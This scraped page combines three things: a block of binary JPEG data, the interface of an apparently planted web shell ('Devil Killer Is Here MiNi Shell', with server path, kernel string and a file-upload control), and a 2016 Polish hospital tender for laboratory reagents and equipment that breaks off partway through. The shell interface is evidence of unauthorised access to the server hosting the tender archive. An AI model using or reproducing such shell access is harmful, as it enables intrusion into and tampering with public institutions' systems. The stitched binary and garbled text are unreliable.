JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160107/4594-N-2016.html

<p class="kh_header"><b>Katowice: Dostawy odczynników oraz drobnego sprzętu laboratoryjnego</b><br>
<b>Numer ogłoszenia: 4594 - 2016; data zamieszczenia: 07.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny nr 6 Śląskiego Uniwersytetu Medycznego w Katowicach Górnośląskie Centrum Zdrowia Dziecka im. Jana Pawła II , ul. Medyków 16, 40-752 Katowice, woj. śląskie, tel. (032) 207 15 32, faks (032) 2071546, 252 6303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gczd.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy odczynników oraz drobnego sprzętu laboratoryjnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1	Drobny Sprzęt Laboratoryjny
2	Drobny Sprzęt Laboratoryjny 1
3	Drobny Sprzęt Laboratoryjny 2
4	Drobny Sprzęt laboratoryjny dla pracowni Mikrobiologii
5	Odczynnik dla Pracowni Serologii
6	Książki serologiczne
7	 Odczynniki dla Pracowni Biochemii
8	Odczynniki dla Pracowni Biochemii 1
9	Odczynniki dla Pracowni Cytogenetyki
10	 Odczynniki dla Pracowni Cytogenetyki 1
11	Odczynniki dla Pracowni Cytogenetyki 2
12	Odczynniki dla Pracowni Analityki Ogólnej
13	Odczynniki dla Pracowni Cytometrii do Cytometru BDFACSCALIBUR firmy Becton Dicinson(2).
14	Odczynniki dla Pracowni Wad Metabolicznych
15	Odczynniki dla Pracowni Wad Metabolicznych 1
16	Odczynnik dla Pracowni Serologii 1.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7, 33.69.65.00-0, 22.10.00.00-1, 33.19.25.00-7, 38.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące posiadania uprawnień do wykonywania działalności będącej przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące posiadania wiedzy i doświadczenia w zakresie objętym przedmiotem zamówienia. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące dysponowania odpowiednim potencjałem technicznym. Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące sytuacji ekonomicznej i finansowej. Wykonawca może polegać na zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a.	oświadczenie, że oferowany przedmiot zamówienia Pakiet nr    posiada wszystkie wymagane przepisami ustawy z dnia 20 maja 2010 r. o wyrobach medycznych /Dz. U z 2010 Nr 107 poz. 679/ dokumenty dopuszczające oferowany przedmiot zamówienia do obrotu i używania                          w podmiotach leczniczych zgodnie z ustawą. W przypadku zaoferowania wyrobów określonych przez Wytwórcę jako ogólno laboratoryjne Wykonawca zobowiązany jest złożyć stosowne oświadczenie,
b.	oświadczenie, że oferowane odczynniki posiadają karty charakterystyki substancji niebezpiecznych, a w przypadku wyrobów nie wymagających w/w kart stosowne oświadczenie,
c.	Próbki oraz wykaz próbek</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4.	Zgodnie z art. 144 ustawy Prawo Zamówień publicznych, Zamawiający dopuszcza zmianę zawartej umowy w trakcie jej trwania, w następujących przypadkach:
a) obniżenia ceny jednostkowej przez Wykonawcę,
b)	zmiany urzędowej stawki podatku VAT; przy czym zmianie ulegnie cena brutto, a cena netto pozostanie bez zmian, i jako obowiązujące z mocy prawa nie będą wymagały zgody obu stron wyrażonej w formie pisemnej (aneks).
c)	zmiany numeru katalogowego przez producenta,
d)	zmiany konfekcjonowania przy założeniu, że cena proponowanego opakowania                              w przeliczeniu na ilości (składu chemicznego i dawki) z oferty nie będzie wyższa niż dotychczasowa,
e)	zmiany terminu obowiązywania umowy w przypadku nie wykorzystania przez Zamawiającego  w trakcie trwania umowy pełnej ilości dostarczanego przedmiotu umowy - przy zachowaniu dotychczasowej ceny,
f)	zmiany producenta przedmiotu umowy, w przypadku gdy producent wskazany w ofercie przez Wykonawcę wycofał dany towar z produkcji - przy cenie nie większej niż w umowie lub jeżeli Wykonawca nie może zaoferować w takim przypadku towar innego producenta w cenie nie wyższej niż w umowie, rozwiązanie jej w zakresie dotyczącym tego towaru za porozumieniem stron, bez konieczności ponoszenia kary przez żadną ze stron umowy,
g)	przedłużenia terminu płatności,
h)	zmiany stawek opłat celnych wprowadzonych decyzjami odpowiednich władz państwowych,
i)	zmiany danych identyfikacyjnych Strony umowy takich jak np. firma, numer konta bankowego, adres, osoby upoważnionej do kontaktów/odbioru lub inne zapisy dotyczące oznaczenia Stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gczd.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W wersji papierowej SIWZ można uzyskać w siedzibie Zamawiającego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.01.2016 godzina 10:00, miejsce: Siedziba Zamawiającego Kancelaria pok. nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Drobny Sprzęt Laboratoryjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Probówko-strzykawka do		Objętość 1-1,5 ml	szt	30 000
	uzyskania surowicy z granulatem				
	Probówko-strzykawka do		Objętość 2-3 ml	szt	33 000
	uzyskania surowicy z żelem				
	Probówko-strzykawka do		Objętość 4-6 ml	szt	6 000
	uzyskania surowicy z granulatem				
2	Probówko-strzykawka do uzyskania  osocza z cytrynianem sodu do oznaczeń koagulologicznych		Objętość 1-1,2ml	szt	12 000
					
					
3	Probówko-strzykawka do  oznaczeń hematologicznych z K3 EDTA		Objętość 1-1,6 ml	szt	30 000
4	Probówko-strzykawka z  heparyną litową		Objętość 1-1,5 ml	szt	1 000
					
5	Igła systemowa :			szt	10 000
a	Igła systemowa  0,7-0,9 mm  x 38 mm				
b	Igła systemowa  0,7- 0,8 mm x 25 mm				
6	Igła motylkowa 0,6-0,9 mm			szt	5 000
					
7	Adapter do posiewu krwi  igła motylkowa z adapterem do posiewu			szt	3 600
8	Łącznik do końcówek luer (multiadapter)			szt	10 000
					
9	 Łącznik do gazometrii			szt	3000
	Adapter membrana				
10	Probówko-strzykawka z  heparyną sodową 		Objętość 7,5  ml	szt	500
11	Probówko-strzykawka z EDTA		Objętość 9-10 ml	szt	800
12	Strzykawka do gazometrii z heparyną litową zbalansowaną  wapniem, obj.1 - 2 ml		Objętość 1- 2 ml	szt	4 500
					
13	Probówko-strzykawka do glukozy z NaF		Objętość 1-1,5 ml	szt	3 500
14	Probówko-strzykawka do OB		Objętość 1,5 - 2 ml 	szt	1 000
15	Rurka do OB ze skalą			szt	1 000
16	Statyw do OB			szt	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7, 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Drobny Sprzęt Laboratoryjny (1).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Butelka hodowlana sterylnie pakowana o poj 50 ml, pow 25 cm 2		szt	1000
2	Pipeta Pasteura plastikowa, o poj 3,5 ml z podziałką		szt	13000
				
3	Końcówka bezbarwna MLA 250-1000 ?l		szt	12500
4	Pipeta Pasteura plastikowa, o poj 3,5 ml z podziałką, sterylna		szt	1008.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Drobny Sprzęt Laboratoryjny (2).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Wymazówki jednorazowe bez podłoża transportowego sterylne z plastikowym patyczkiem.		szt	6000
2	Pojemniki plastikowe na kał z łopatką.		szt	2000
3	Probówki szklane okrągłodenne śr. 15-16 mm,  dł 10 cm		szt	10000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Drobny Sprzęt Laboratoryjny dla pracowni Mikrobiologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Pojemnik plastikowy szczelnie zamykany do hodowli beztlenowców o pojemności 2,5 l		szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Odczynnik dla Pracowni Serologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Odczynnik monoklonalny anty-A klon I		op	12
2	Odczynnik monoklonalny anty-A klon II		op	12
3	Odczynnik monoklonalny anty-B klon I		op	12
4	Odczynnik monoklonalny anty-B klon II		op	12
5	Odczynnik monoklonalny anty-D Blend		op	18
6	Odczynnik monoklonalny anty-D Rum		op	15
7	Surowica anty globulinowa poliwalentna płynna		op	2
8	Odczynnik  anty-IgG		op	4
9	PEG (20% r-r glikolu polietylenowego)		op	4
11	LISS -L(płynny)		op	15
12	Standard anty - D		op	6
13	PBS - buforowany roztwór soli fiziologicznej		butelka	120
14	Konserwowane Krwinki Wzorcowe do układu ABO		zestaw	48
15	Konserwowane Krwinki Wzorcowe do wykrywania przeciwciał		zestaw	12
				
16	Konserwowane Krwinki Wzorcowe Opłaszczone do kontroli BTA		zestaw	12
				
17	Standaryzowane Krwinki Wzorcowe  O RH + opłaszczone przeciwciałami anty-D		zestaw	12
				
18	Standard anty - D do mikrometody		op	6
19	Surowica AB-koloid		op	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Książki serologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Książka prób zgodnośi dla Laboratoriów		szt	3
2	Książka badania grup krwi dla Laboratoriów		szt	6
3	Książka obrotu krwią dla Szpitali		szt	3
4	Książka protokołów badań codziennej kontroli aktywności odczynników diagnostycznych		szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Odczynniki dla Pracowni Biochemii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw do ilościowego oznaczania przeciwciał przeciw transglutaminazie w klasie IgA, metodą Elisa wraz z aplikacją do analizatora mini BOS. Cut-off - 20 jednostek reaktywnych ( arbitralnych).Wymagany antygen wykorzystany w zestawie - rekombinowana transglutaminaza ludzka.		op	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Odczynniki dla Pracowni Biochemii (1).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw do oznaczania przeciwciał IgG anty glista ludzka metodą Elisa + aplikacje do analizatora mini BOS		op	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Odczynniki dla Pracowni Cytogenetyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Metanol czda		op	15
2	Kwas octowy 99,5 % czda		op	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
